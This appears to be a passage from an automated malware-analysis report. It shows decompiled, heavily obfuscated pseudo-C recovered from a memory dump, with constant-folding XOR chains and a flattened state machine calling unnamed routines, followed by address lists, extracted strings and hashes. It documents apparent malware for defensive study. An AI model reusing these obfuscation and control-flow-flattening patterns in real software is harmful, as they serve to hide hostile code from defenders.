				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				unsigned int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				intOrPtr _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				void* _t569;
				void* _t616;
				void* _t620;
				intOrPtr _t623;
				void* _t628;
				void* _t631;
				void* _t639;
				void* _t643;
				intOrPtr _t649;
				void* _t668;
				void* _t706;
				signed int _t721;
				void* _t722;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				signed int _t735;
				void* _t736;
				void* _t739;
				signed int* _t741;
				void* _t744;

				_t649 = __ecx;
				_push(_a20);
				_v208 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(0x20);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00BB8002(_t569);
				_v252 = 0xb850c4;
				_t741 =  &(( &_v272)[7]);
				_v252 = _v252 + 0xffff1b87;
				_t739 = 0;
				_t643 = 0x31427ed;
				_t724 = 0x38;
				_v252 = _v252 / _t724;
				_v252 = _v252 | 0x7484239e;
				_v252 = _v252 ^ 0x7487679f;
				_v228 = 0x671610;
				_v228 = _v228 << 9;
				_v228 = _v228 + 0xffffbdb7;
				_t721 = 0x48;
				_v228 = _v228 / _t721;
				_v228 = _v228 ^ 0x02dd0dbe;
				_v248 = 0x6d45a8;
				_v248 = _v248 ^ 0xcdaaf4a8;
				_v248 = _v248 | 0x2aa6e37d;
				_v248 = _v248 >> 0xc;
				_v248 = _v248 ^ 0x000efe7f;
				_v56 = 0x1d0414;
				_v56 = _v56 ^ 0xe63e9f7a;
				_v56 = _v56 ^ 0xe6239b6e;
				_v196 = 0xdbff9;
				_v196 = _v196 + 0xffffdf67;
				_v196 = _v196 >> 9;
				_v196 = _v196 ^ 0x000006cf;
				_v88 = 0xee2915;
				_t725 = 0x5a;
				_v88 = _v88 / _t725;
				_v88 = _v88 ^ 0x0002a56f;
				_v256 = 0x30f311;
				_t726 = 0x7d;
				_v256 = _v256 * 0x6c;
				_v256 = _v256 / _t726;
				_v256 = _v256 + 0xffff130d;
				_v256 = _v256 ^ 0x00295de4;
				_v268 = 0xd74e11;
				_v268 = _v268 >> 0xb;
				_v268 = _v268 + 0x536c;
				_v268 = _v268 + 0xffff4a38;
				_v268 = _v268 ^ 0xffffb88d;
				_v128 = 0x78165c;
				_v128 = _v128 ^ 0x119f2f8b;
				_v128 = _v128 >> 5;
				_v128 = _v128 ^ 0x008f39ce;
				_v260 = 0x46e0dd;
				_v260 = _v260 * 0x14;
				_v260 = _v260 << 4;
				_v260 = _v260 * 0x3f;
				_v260 = _v260 ^ 0xcdabfbc0;
				_v144 = 0x6701dd;
				_v144 = _v144 ^ 0x9279afad;
				_v144 = _v144 + 0xffff89d5;
				_v144 = _v144 ^ 0x921e3845;
				_v108 = 0x3d44ad;
				_v108 = _v108 >> 1;
				_v108 = _v108 >> 6;
				_v108 = _v108 ^ 0x00007a89;
				_v92 = 0x45ba2c;
				_t727 = 0x62;
				_v92 = _v92 * 0x4a;
				_v92 = _v92 ^ 0x1427283f;
				_v52 = 0x343fab;
				_v52 = _v52 + 0x68e6;
				_v52 = _v52 ^ 0x003405e0;
				_v176 = 0xaf3889;
				_v176 = _v176 ^ 0xc23279d7;
				_v176 = _v176 * 0x1b;
				_v176 = _v176 ^ 0x869c530f;
				_v28 = 0xf4b427;
				_v28 = _v28 | 0x483a8d57;
				_v28 = _v28 ^ 0x48fe78d2;
				_v112 = 0x10db4e;
				_v112 = _v112 ^ 0xf1aff679;
				_v112 = _v112 << 0xa;
				_v112 = _v112 ^ 0xfcbe5c75;
				_v76 = 0x14b737;
				_v76 = _v76 + 0x7c5f;
				_v76 = _v76 ^ 0x0013f1cb;
				_v44 = 0x7484d8;
				_v44 = _v44 * 9;
				_v44 = _v44 ^ 0x04160bfd;
				_v84 = 0x9b7484;
				_v84 = _v84 | 0x5f4a7202;
				_v84 = _v84 ^ 0x5fdf5c37;
				_v168 = 0xda0fbd;
				_v168 = _v168 / _t721;
				_v168 = _v168 * 0x1b;
				_v168 = _v168 ^ 0x0053367e;
				_v68 = 0x2fa43a;
				_v68 = _v68 ^ 0x0df30566;
				_v68 = _v68 ^ 0x0ddaec5a;
				_v32 = 0xc1ec80;
				_v32 = _v32 / _t727;
				_v32 = _v32 ^ 0x000e66f3;
				_v160 = 0x6b4fac;
				_v160 = _v160 + 0x12eb;
				_v160 = _v160 | 0x6651ce0a;
				_v160 = _v160 ^ 0x667f6b6f;
				_v136 = 0x33b0f4;
				_v136 = _v136 ^ 0xd9a5f0ed;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 ^ 0x000f0842;
				_v36 = 0x2a6a0f;
				_v36 = _v36 * 0x2e;
				_v36 = _v36 ^ 0x07936512;
				_v72 = 0x697fd1;
				_v72 = _v72 ^ 0xbf1512e6;
				_v72 = _v72 ^ 0xbf789ab5;
				_v148 = 0xe185e4;
				_v148 = _v148 ^ 0xe5b2acdb;
				_v148 = _v148 + 0xffff9d18;
				_v148 = _v148 ^ 0xe55c8429;
				_v124 = 0x9fa9d1;
				_t728 = 0x5c;
				_v124 = _v124 / _t728;
				_v124 = _v124 + 0xffff2216;
				_v124 = _v124 ^ 0x00077867;
				_v132 = 0x8adf9e;
				_v132 = _v132 + 0x9a5e;
				_v132 = _v132 ^ 0x1a624471;
				_v132 = _v132 ^ 0x1ae76519;
				_v64 = 0x313708;
				_v64 = _v64 | 0x04d552f5;
				_v64 = _v64 ^ 0x04f75265;
				_v240 = 0xb80a70;
				_v240 = _v240 + 0x66b6;
				_v240 = _v240 | 0x1a350fc1;
				_v240 = _v240 + 0xffffcc70;
				_v240 = _v240 ^ 0x1abc6eb5;
				_v140 = 0x2912e7;
				_v140 = _v140 | 0xe2603e46;
				_v140 = _v140 + 0x7e97;
				_v140 = _v140 ^ 0xe265e9db;
				_v116 = 0x821ea6;
				_t729 = 0x2c;
				_v116 = _v116 * 0x36;
				_v116 = _v116 + 0x5511;
				_v116 = _v116 ^ 0x1b7bb2e8;
				_v232 = 0xf0e9f8;
				_v232 = _v232 * 0x7a;
				_v232 = _v232 + 0xffff16fe;
				_v232 = _v232 + 0xffff2a1a;
				_v232 = _v232 ^ 0x72ce1a31;
				_v48 = 0xf5efb0;
				_v48 = _v48 + 0xffff94f3;
				_v48 = _v48 ^ 0x00fb4f00;
				_v156 = 0x5ba670;
				_v156 = _v156 * 0x1a;
				_v156 = _v156 >> 0xf;
				_v156 = _v156 ^ 0x000aa99f;
				_v164 = 0xe620a;
				_v164 = _v164 | 0x6cacc763;
				_v164 = _v164 + 0xffff3d7f;
				_v164 = _v164 ^ 0x6caebe8e;
				_v264 = 0x43c5d0;
				_v264 = _v264 | 0xb2ae0f18;
				_v264 = _v264 + 0xffff20a5;
				_v264 = _v264 + 0x8e2a;
				_v264 = _v264 ^ 0xb2e472bd;
				_v96 = 0x6313ef;
				_v96 = _v96 + 0x1112;
				_v96 = _v96 ^ 0x006c6cc1;
				_v200 = 0xd4b609;
				_v200 = _v200 / _t729;
				_v200 = _v200 | 0x8315fc57;
				_v200 = _v200 ^ 0x83102fe5;
				_v100 = 0x2b0f3c;
				_v100 = _v100 >> 5;
				_v100 = _v100 ^ 0x00084a15;
				_v24 = 0xb53f51;
				_v24 = _v24 << 0xc;
				_v24 = _v24 ^ 0x53fe8c9e;
				_v60 = 0xdeceb1;
				_v60 = _v60 << 6;
				_v60 = _v60 ^ 0x37b3ff62;
				_v192 = 0x1ce17f;
				_v192 = _v192 * 0x2a;
				_v192 = _v192 >> 0xa;
				_v192 = _v192 ^ 0x000a04b3;
				_v152 = 0x50af57;
				_v152 = _v152 + 0xffffa32e;
				_v152 = _v152 + 0x3d8;
				_v152 = _v152 ^ 0x0055a199;
				_v172 = 0x237ec8;
				_v172 = _v172 << 9;
				_v172 = _v172 | 0x4009841a;
				_v172 = _v172 ^ 0x46f72838;
				_v104 = 0x126ce;
				_v104 = _v104 + 0x6844;
				_v104 = _v104 ^ 0x000df250;
				_v184 = 0x7f89e0;
				_t730 = 0x7c;
				_v184 = _v184 * 0x13;
				_v184 = _v184 + 0x9bdf;
				_v184 = _v184 ^ 0x097566f3;
				_v220 = 0x80e5a4;
				_v220 = _v220 >> 4;
				_v220 = _v220 >> 0xc;
				_v220 = _v220 << 0xb;
				_v220 = _v220 ^ 0x0004633a;
				_v236 = 0xa3af09;
				_v236 = _v236 + 0xd396;
				_v236 = _v236 / _t730;
				_v236 = _v236 << 6;
				_v236 = _v236 ^ 0x005e9d44;
				_v272 = 0xdcaf57;
				_v272 = _v272 >> 0x10;
				_v272 = _v272 + 0xffffbaf3;
				_v272 = _v272 + 0xa902;
				_v272 = _v272 ^ 0x00015b44;
				_v212 = 0xf8cf2f;
				_v212 = _v212 + 0xffff434a;
				_t731 = 0x43;
				_v212 = _v212 / _t731;
				_v212 = _v212 + 0xebc7;
				_v212 = _v212 ^ 0x000808bb;
				_v244 = 0xab67d2;
				_v244 = _v244 + 0xa2f6;
				_v244 = _v244 ^ 0x53709e51;
				_t732 = 0x53;
				_v244 = _v244 * 0x4d;
				_v244 = _v244 ^ 0x39596a5b;
				_v120 = 0xeb205c;
				_t415 =  &_v120; // 0xeb205c
				_v120 =  *_t415 / _t732;
				_v120 = _v120 << 0x10;
				_v120 = _v120 ^ 0xd53d7c47;
				_v204 = 0x928934;
				_t733 = 0x65;
				_v204 = _v204 / _t733;
				_v204 = _v204 << 4;
				_v204 = _v204 ^ 0x00124f63;
				_v180 = 0xfa33d6;
				_v180 = _v180 >> 0xe;
				_v180 = _v180 | 0xba2d9757;
				_v180 = _v180 ^ 0xba2e1214;
				_v80 = 0x3a8b30;
				_v80 = _v80 | 0xac97b1c6;
				_v80 = _v80 ^ 0xacba9565;
				_v188 = 0xb91ef8;
				_v188 = _v188 ^ 0x088b963f;
				_v188 = _v188 >> 8;
				_v188 = _v188 ^ 0x0001fb3d;
				_v40 = 0x2fe7d8;
				_v40 = _v40 + 0xc7f9;
				_v40 = _v40 ^ 0x003a6680;
				_v216 = 0x6f56e7;
				_v216 = _v216 + 0xfffff5e8;
				_t722 = 0xd7342cb;
				_t734 = 0x71;
				_v216 = _v216 / _t734;
				_v216 = _v216 + 0x8f1f;
				_v216 = _v216 ^ 0x0001ab71;
				_v224 = 0x334e4d;
				_v224 = _v224 >> 3;
				_v224 = _v224 << 0xf;
				_t735 = 0x5e;
				_t736 = 0xaa6f2cb;
				_v224 = _v224 / _t735;
				_v224 = _v224 ^ 0x009dce1e;
				while(1) {
					L1:
					while(1) {
						do {
							while(1) {
								L3:
								_t744 = _t643 - _t736;
								if(_t744 > 0) {
									break;
								}
								if(_t744 == 0) {
									_t628 = E00BB36B6(_v12, _v264, _v196, _v88, _v8,  &_v20, _v96, _v200, _v100, _v24, _v16, _t649, _v60);
									_t741 =  &(_t741[0xb]);
									__eflags = _t628 - _v256;
									_t706 = 0x43cb520;
									_t649 = _v208;
									_t620 = 0x3c47c30;
									_t643 =  ==  ? 0x43cb520 : 0xf968961;
									continue;
								} else {
									if(_t643 == 0x40b594) {
										E00BD296F(_v272, _v212, _v244, _v20, _v120);
										_t741 =  &(_t741[3]);
										_t643 = 0xf968961;
										goto L12;
									} else {
										if(_t643 == 0x31427ed) {
											_t643 = 0x3ae9152;
											continue;
										} else {
											if(_t643 == 0x3ae9152) {
												_push(0xbb1648);
												_t631 = E00BD0AD3(_v92, _v52, __eflags);
												 *_t741 = 0xbb15c8;
												__eflags = E00BB92DD(_t631, _v252, _v112,  &_v16, E00BD0AD3(_v176, _v28, __eflags), _v76, _v44, _v84) - _v228;
												_t643 =  ==  ? 0xb82defd : 0xe240aa1;
												E00BC2EED(_v168, _v68, _v32, _t631);
												E00BC2EED(_v160, _v136, _v36, _t632);
												_t741 =  &(_t741[0xa]);
												_t722 = 0xd7342cb;
												L24:
												_t649 = _v208;
												_t706 = 0x43cb520;
												_t620 = 0x3c47c30;
												_t736 = 0xaa6f2cb;
												goto L25;
											} else {
												if(_t643 == _t620) {
													_push(_t649);
													_push(_v236);
													_push(_v260);
													_push(_v220);
													_push(_v20);
													_push(_v184);
													_t668 = 0x20;
													_t639 = E00BCC678(_t668, _v104);
													_t741 =  &(_t741[6]);
													_t643 = 0x40b594;
													__eflags = _t639 - _v144;
													_t739 =  ==  ? 1 : _t739;
													L12:
													_t649 = _v208;
													goto L1;
												} else {
													if(_t643 != _t706) {
														goto L25;
													} else {
														E00BBAC44(_v20, _a12, _v192, _a16, _v152, _v268, _v172);
														_t741 =  &(_t741[5]);
														_t649 = _v208;
														_t620 = 0x3c47c30;
														_t643 =  ==  ? 0x3c47c30 : 0x40b594;
														continue;
													}
												}
											}
										}
									}
								}
								L28:
								return _t739;
							}
							__eflags = _t643 - 0xb82defd;
							if(__eflags == 0) {
								_push(0xbb1618);
								_t616 = E00BB5894(_v124,  &_v8, _v132,  &_v4, _v64, _v240, E00BD0AD3(_v72, _v148, __eflags), _v248, _v140, _v16);
								_t741 =  &(_t741[9]);
								__eflags = _t616 - _v56;
								_t643 =  ==  ? 0xc658524 : _t722;
								E00BC2EED(_v116, _v232, _v48, _t614);
								goto L24;
							} else {
								__eflags = _t643 - 0xc658524;
								if(_t643 == 0xc658524) {
									_push(_t649);
									_t623 = E00BC6F53(_v8);
									__eflags = _t623;
									_v12 = _t623;
									_t643 =  !=  ? _t736 : _t722;
									goto L12;
								} else {
									__eflags = _t643 - _t722;
									if(_t643 == _t722) {
										E00BB2CF9(_v40, _v216, _v108, _v224, _v16);
									} else {
										__eflags = _t643 - 0xf968961;
										if(_t643 != 0xf968961) {
											goto L25;
										} else {
											E00BBF699(_v204, _v12, _v180, _v80, _v188);
											_t741 =  &(_t741[3]);
											_t643 = _t722;
											goto L12;
										}
									}
								}
							}
							goto L28;
							L25:
							__eflags = _t643 - 0xe240aa1;
						} while (__eflags != 0);
						goto L28;
					}
				}
			}

0x00bd0c66
0x00bd0c70
0x00bd0c77
0x00bd0c7b
0x00bd0c82
0x00bd0c89
0x00bd0c8b
0x00bd0c92
0x00bd0c93
0x00bd0c94
0x00bd0c99
0x00bd0ca1
0x00bd0ca4
0x00bd0cb2
0x00bd0cb4
0x00bd0cbb
0x00bd0cc0
0x00bd0cc6
0x00bd0cce
0x00bd0cd6
0x00bd0cde
0x00bd0ce3
0x00bd0cef
0x00bd0cf4
0x00bd0cfa
0x00bd0d02
0x00bd0d0a
0x00bd0d12
0x00bd0d1a
0x00bd0d1f
0x00bd0d27
0x00bd0d32
0x00bd0d3d
0x00bd0d48
0x00bd0d50
0x00bd0d58
0x00bd0d5d
0x00bd0d65
0x00bd0d77
0x00bd0d7c
0x00bd0d85
0x00bd0d90
0x00bd0d9d
0x00bd0d9e
0x00bd0da8
0x00bd0dac
0x00bd0db4
0x00bd0dbc
0x00bd0dc4
0x00bd0dc9
0x00bd0dd1
0x00bd0dd9
0x00bd0de1
0x00bd0dec
0x00bd0df7
0x00bd0dff
0x00bd0e0a
0x00bd0e17
0x00bd0e1b
0x00bd0e25
0x00bd0e2b
0x00bd0e33
0x00bd0e3e
0x00bd0e49
0x00bd0e54
0x00bd0e5f
0x00bd0e6a
0x00bd0e71
0x00bd0e79
0x00bd0e84
0x00bd0e99
0x00bd0e9c
0x00bd0ea3
0x00bd0eae
0x00bd0eb9
0x00bd0ec4
0x00bd0ecf
0x00bd0ed7
0x00bd0ee4
0x00bd0ee8
0x00bd0ef0
0x00bd0efb
0x00bd0f06
0x00bd0f11
0x00bd0f1c
0x00bd0f27
0x00bd0f2f
0x00bd0f3a
0x00bd0f45
0x00bd0f50
0x00bd0f5b
0x00bd0f6e
0x00bd0f75
0x00bd0f80
0x00bd0f8b
0x00bd0f96
0x00bd0fa1
0x00bd0fb1
0x00bd0fba
0x00bd0fbe
0x00bd0fc6
0x00bd0fd1
0x00bd0fdc
0x00bd0fe7
0x00bd0ffb
0x00bd1002
0x00bd100d
0x00bd1018
0x00bd1023
0x00bd102e
0x00bd1039
0x00bd1044
0x00bd104f
0x00bd1057
0x00bd1062
0x00bd1075
0x00bd107c
0x00bd1087
0x00bd1092
0x00bd109d
0x00bd10a8
0x00bd10b3
0x00bd10be
0x00bd10c9
0x00bd10d6
0x00bd10e8
0x00bd10ed
0x00bd10f6
0x00bd1101
0x00bd110c
0x00bd1117
0x00bd1122
0x00bd112d
0x00bd1138
0x00bd1143
0x00bd114e
0x00bd1159
0x00bd1161
0x00bd1169
0x00bd1171
0x00bd1179
0x00bd1181
0x00bd118c
0x00bd1197
0x00bd11a2
0x00bd11ad
0x00bd11c0
0x00bd11c1
0x00bd11c8
0x00bd11d3
0x00bd11de
0x00bd11eb
0x00bd11ef
0x00bd11f7
0x00bd11ff
0x00bd1207
0x00bd1212
0x00bd121d
0x00bd1228
0x00bd123b
0x00bd1242
0x00bd124a
0x00bd1255
0x00bd125d
0x00bd1265
0x00bd126d
0x00bd1275
0x00bd127d
0x00bd1285
0x00bd128d
0x00bd1295
0x00bd129d
0x00bd12a8
0x00bd12b3
0x00bd12be
0x00bd12cc
0x00bd12d0
0x00bd12d8
0x00bd12e0
0x00bd12eb
0x00bd12f3
0x00bd12fe
0x00bd1309
0x00bd1311
0x00bd131c
0x00bd1327
0x00bd132f
0x00bd133a
0x00bd1347
0x00bd134b
0x00bd1350
0x00bd1358
0x00bd1363
0x00bd136e
0x00bd1379
0x00bd1384
0x00bd138c
0x00bd1391
0x00bd139b
0x00bd13a3
0x00bd13ae
0x00bd13b9
0x00bd13c4
0x00bd13d3
0x00bd13d6
0x00bd13da
0x00bd13e2
0x00bd13ea
0x00bd13f2
0x00bd13f7
0x00bd13fc
0x00bd1401
0x00bd1409
0x00bd1411
0x00bd1421
0x00bd1425
0x00bd142a
0x00bd1432
0x00bd143a
0x00bd143f
0x00bd1447
0x00bd144f
0x00bd1457
0x00bd145f
0x00bd146b
0x00bd1470
0x00bd1476
0x00bd147e
0x00bd1486
0x00bd148e
0x00bd1496
0x00bd14a3
0x00bd14a6
0x00bd14aa
0x00bd14b2
0x00bd14bd
0x00bd14c8
0x00bd14cf
0x00bd14d7
0x00bd14e2
0x00bd14ee
0x00bd14f1
0x00bd14f5
0x00bd14fa
0x00bd1502
0x00bd150a
0x00bd150f
0x00bd1517
0x00bd151f
0x00bd152a
0x00bd1535
0x00bd1540
0x00bd1548
0x00bd1550
0x00bd1555
0x00bd155d
0x00bd1568
0x00bd1573
0x00bd157e
0x00bd1586
0x00bd1596
0x00bd159b
0x00bd15a0
0x00bd15a6
0x00bd15ae
0x00bd15b6
0x00bd15be
0x00bd15c3
0x00bd15cc
0x00bd15cf
0x00bd15d4
0x00bd15d8
0x00bd15e0
0x00bd15e0
0x00bd15e5
0x00bd15ea
0x00bd15ea
0x00bd15ea
0x00bd15ea
0x00bd15ec
0x00000000
0x00000000
0x00bd15f2
0x00bd1804
0x00bd180b
0x00bd1817
0x00bd1819
0x00bd181e
0x00bd1822
0x00bd1827
0x00000000
0x00bd15f8
0x00bd15fe
0x00bd17a2
0x00bd17a7
0x00bd17aa
0x00000000
0x00bd1604
0x00bd160a
0x00bd177e
0x00000000
0x00bd1610
0x00bd1616
0x00bd16d0
0x00bd16d5
0x00bd16e7
0x00bd1731
0x00bd174e
0x00bd1751
0x00bd176c
0x00bd1771
0x00bd1774
0x00bd1934
0x00bd1934
0x00bd1938
0x00bd193d
0x00bd1942
0x00000000
0x00bd161c
0x00bd161e
0x00bd1679
0x00bd167a
0x00bd167e
0x00bd1682
0x00bd1686
0x00bd168d
0x00bd169a
0x00bd169b
0x00bd16ac
0x00bd16af
0x00bd16b4
0x00bd16b6
0x00bd16b9
0x00bd16b9
0x00000000
0x00bd1620
0x00bd1622
0x00000000
0x00bd1628
0x00bd1650
0x00bd1657
0x00bd1668
0x00bd166c
0x00bd1671
0x00000000
0x00bd15e5
0x00bd1622
0x00bd161e
0x00bd1616
0x00bd160a
0x00bd15fe
0x00bd197c
0x00bd1986
0x00bd1986
0x00bd182f
0x00bd1835
0x00bd18b6
0x00bd18fd
0x00bd1902
0x00bd1910
0x00bd1923
0x00bd192d
0x00000000
0x00bd1837
0x00bd1837
0x00bd183d
0x00bd188e
0x00bd188f
0x00bd1894
0x00bd1896
0x00bd18a0
0x00000000
0x00bd183f
0x00bd183f
0x00bd1841
0x00bd1972
0x00bd1847
0x00bd1847
0x00bd184d
0x00000000
0x00bd1853
0x00bd186d
0x00bd1872
0x00bd1875
0x00000000
0x00bd1875
0x00bd184d
0x00bd1841
0x00bd183d
0x00000000
0x00bd1947
0x00bd1947
0x00bd1947
0x00000000
0x00bd1953
0x00bd15e5

Strings

MN3, xrefs: 00BD15B6
Dh, xrefs: 00BD13AE
h, xrefs: 00BD0EB9
\ , xrefs: 00BD14BD
lS, xrefs: 00BD0DC9
Vo, xrefs: 00BD157E
]), xrefs: 00BD0DB4
[jY9, xrefs: 00BD14AA
~6S, xrefs: 00BD0FBE
_|, xrefs: 00BD0F45
F>`, xrefs: 00BD118C

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: Dh$F>`$MN3$[jY9$\ $_|$lS$~6S$Vo$])$h
API String ID: 0-4083489536
Opcode ID: 22e500adb55872b056b86fb949a1c81e5cb0c7cd713893171499a646b0f4c958
Instruction ID: a8bad33a994dc770b8011cccdadccd3b5f64371dd3aaf3314f4946e842ecdc76
Opcode Fuzzy Hash: 22e500adb55872b056b86fb949a1c81e5cb0c7cd713893171499a646b0f4c958
Instruction Fuzzy Hash: E7620D715083819FD3B8CF65C58AB9BBBE2BBC4314F10891DE2DA96260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00BB3E3B, Relevance: 14.2, Strings: 11, Instructions: 427
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E00BB3E3B() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				intOrPtr _v1568;
				char _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				void* _t475;
				void* _t476;
				void* _t483;
				intOrPtr* _t495;
				signed int _t498;
				intOrPtr* _t500;
				signed int _t501;
				signed int _t502;
				signed int _t503;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				void* _t518;
				void* _t520;
				void* _t578;
				signed int* _t583;

				_t583 =  &_v1740;
				_v1568 = 0xf4c82e;
				_v1564 = 0;
				_v1616 = 0x7c462e;
				_v1576 = 0;
				_t578 = 0xb4e665b;
				_t501 = 0x2f;
				_v1616 = _v1616 / _t501;
				_v1616 = _v1616 | 0xe5144df6;
				_v1616 = _v1616 ^ 0xe516edde;
				_v1640 = 0xf648e5;
				_v1640 = _v1640 << 5;
				_v1640 = _v1640 | 0xd0c65f8c;
				_v1640 = _v1640 ^ 0x5ecf5fad;
				_v1672 = 0x45ee00;
				_t502 = 0x77;
				_v1672 = _v1672 / _t502;
				_v1672 = _v1672 | 0xf06707b6;
				_v1672 = _v1672 ^ 0xf06797fd;
				_v1700 = 0xea4f48;
				_v1700 = _v1700 + 0x6269;
				_v1700 = _v1700 + 0xffff8cfc;
				_v1700 = _v1700 + 0x3e5e;
				_v1700 = _v1700 ^ 0x00ea7d0a;
				_v1612 = 0xe88c42;
				_v1612 = _v1612 << 0xf;
				_v1612 = _v1612 ^ 0x4622b37f;
				_v1692 = 0x24d80;
				_t503 = 0x43;
				_v1692 = _v1692 * 0x59;
				_v1692 = _v1692 ^ 0xe0926b83;
				_v1692 = _v1692 + 0x5a69;
				_v1692 = _v1692 ^ 0xe05a8f60;
				_v1732 = 0x434204;
				_v1732 = _v1732 / _t503;
				_v1732 = _v1732 ^ 0x5a31263e;
				_v1732 = _v1732 >> 2;
				_v1732 = _v1732 ^ 0x16898105;
				_v1708 = 0x1ae525;
				_v1708 = _v1708 + 0x5b0;
				_t504 = 0x4d;
				_v1708 = _v1708 / _t504;
				_v1708 = _v1708 + 0xfe9;
				_v1708 = _v1708 ^ 0x000e43f2;
				_v1644 = 0x901f25;
				_v1644 = _v1644 + 0xffff2dc4;
				_t505 = 0x3d;
				_v1644 = _v1644 / _t505;
				_v1644 = _v1644 ^ 0x00024b56;
				_v1580 = 0x5c4edc;
				_v1580 = _v1580 ^ 0xe13f7f20;
				_v1580 = _v1580 ^ 0xe1618c1f;
				_v1584 = 0x21a5f1;
				_v1584 = _v1584 + 0xffff31e6;
				_v1584 = _v1584 ^ 0x002f4f1b;
				_v1664 = 0x8f6d68;
				_t506 = 0x74;
				_v1664 = _v1664 * 0x12;
				_v1664 = _v1664 << 0xd;
				_v1664 = _v1664 ^ 0xb6270455;
				_v1668 = 0x1fe57f;
				_v1668 = _v1668 << 7;
				_v1668 = _v1668 * 0x26;
				_v1668 = _v1668 ^ 0x5e099b11;
				_v1676 = 0x17d12;
				_v1676 = _v1676 + 0xffff8639;
				_v1676 = _v1676 + 0x2710;
				_v1676 = _v1676 ^ 0x000f3b80;
				_v1620 = 0xbe2f7a;
				_v1620 = _v1620 + 0xffffd1d1;
				_v1620 = _v1620 / _t506;
				_v1620 = _v1620 ^ 0x0004c798;
				_v1684 = 0xccb500;
				_t507 = 0xe;
				_v1684 = _v1684 / _t507;
				_t508 = 0x25;
				_v1684 = _v1684 / _t508;
				_v1684 = _v1684 >> 1;
				_v1684 = _v1684 ^ 0x0004e54a;
				_v1716 = 0x1281ad;
				_v1716 = _v1716 << 4;
				_v1716 = _v1716 | 0x35eb381e;
				_v1716 = _v1716 ^ 0x661831c8;
				_v1716 = _v1716 ^ 0x53f42a5f;
				_v1736 = 0xc42e7a;
				_v1736 = _v1736 | 0xac555f80;
				_v1736 = _v1736 ^ 0xdad5f6d1;
				_v1736 = _v1736 ^ 0x07b51a8c;
				_v1736 = _v1736 ^ 0x71b457e1;
				_v1740 = 0x58cdf0;
				_t509 = 0x4e;
				_v1740 = _v1740 / _t509;
				_t510 = 0x7c;
				_v1740 = _v1740 / _t510;
				_v1740 = _v1740 + 0xffff7d2e;
				_v1740 = _v1740 ^ 0xfffa0866;
				_v1656 = 0xab20b7;
				_v1656 = _v1656 + 0xffff4ec7;
				_v1656 = _v1656 >> 0xa;
				_v1656 = _v1656 ^ 0x000ac3bb;
				_v1648 = 0x73aeba;
				_v1648 = _v1648 ^ 0x5c536f7b;
				_v1648 = _v1648 >> 3;
				_v1648 = _v1648 ^ 0x0b822968;
				_v1728 = 0x2b315e;
				_t511 = 0x71;
				_v1728 = _v1728 * 0x14;
				_v1728 = _v1728 / _t511;
				_v1728 = _v1728 << 2;
				_v1728 = _v1728 ^ 0x00117be2;
				_v1624 = 0xf38d74;
				_v1624 = _v1624 + 0xffff2ff7;
				_v1624 = _v1624 << 8;
				_v1624 = _v1624 ^ 0xf2b4886e;
				_v1632 = 0x26049;
				_t512 = 0x38;
				_v1632 = _v1632 / _t512;
				_v1632 = _v1632 ^ 0xbad4e020;
				_v1632 = _v1632 ^ 0xbadec9c6;
				_v1712 = 0x2271e9;
				_v1712 = _v1712 + 0xfffffef4;
				_v1712 = _v1712 ^ 0x94302fc7;
				_t513 = 0x21;
				_v1712 = _v1712 * 0x4d;
				_v1712 = _v1712 ^ 0x8983a5b9;
				_v1720 = 0xf256ae;
				_v1720 = _v1720 ^ 0x6b661a38;
				_v1720 = _v1720 * 0x71;
				_v1720 = _v1720 / _t513;
				_v1720 = _v1720 ^ 0x03c0f16f;
				_v1596 = 0xcd00ac;
				_v1596 = _v1596 + 0x3459;
				_v1596 = _v1596 ^ 0x00cb1f3a;
				_v1588 = 0x5c0348;
				_t514 = 0x54;
				_v1588 = _v1588 * 7;
				_v1588 = _v1588 ^ 0x02813856;
				_v1696 = 0xbbab01;
